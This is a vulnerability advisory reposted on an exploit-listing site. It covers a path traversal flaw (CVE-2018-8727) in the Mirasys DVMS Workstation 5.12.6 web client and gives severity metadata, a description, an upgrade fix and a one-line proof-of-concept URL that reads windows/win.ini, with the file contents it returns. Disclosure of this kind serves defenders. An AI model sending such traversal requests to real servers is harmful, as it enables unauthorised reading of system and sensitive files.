Advertisement






Mirasys DVMS Workstation 5.12.6 Path Traversal

CVE Category Price Severity
CVE-2018-8727 CWE-22 $5,000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-22
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.07 0.77754

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060231

Below is a copy:

Mirasys DVMS Workstation 5.12.6 Path Traversal
# Exploit Title: Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6  
# Date: 10-06-2018
# Exploit Author: Onvio, Dick Snel, https://www.onvio.nl
# Vendor Homepage: https://www.mirasys.com/
# Software Link: https://www.onvio.nl/binaries/mirasys_5_12_6.zip
# Version: <= 5.12.6
# Tested on: Windows 10 Pro x64
# CVE : CVE-2018-8727
 
1. Description
 
Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6 allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
 
More detail on the exploit: https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
 
2. Proof of Concept
 
http://localhost:9999/.../.../.../.../.../.../.../.../.../windows/win.ini
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 
 
3. Solution
 
Upgrade to any version > 5.12.6

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum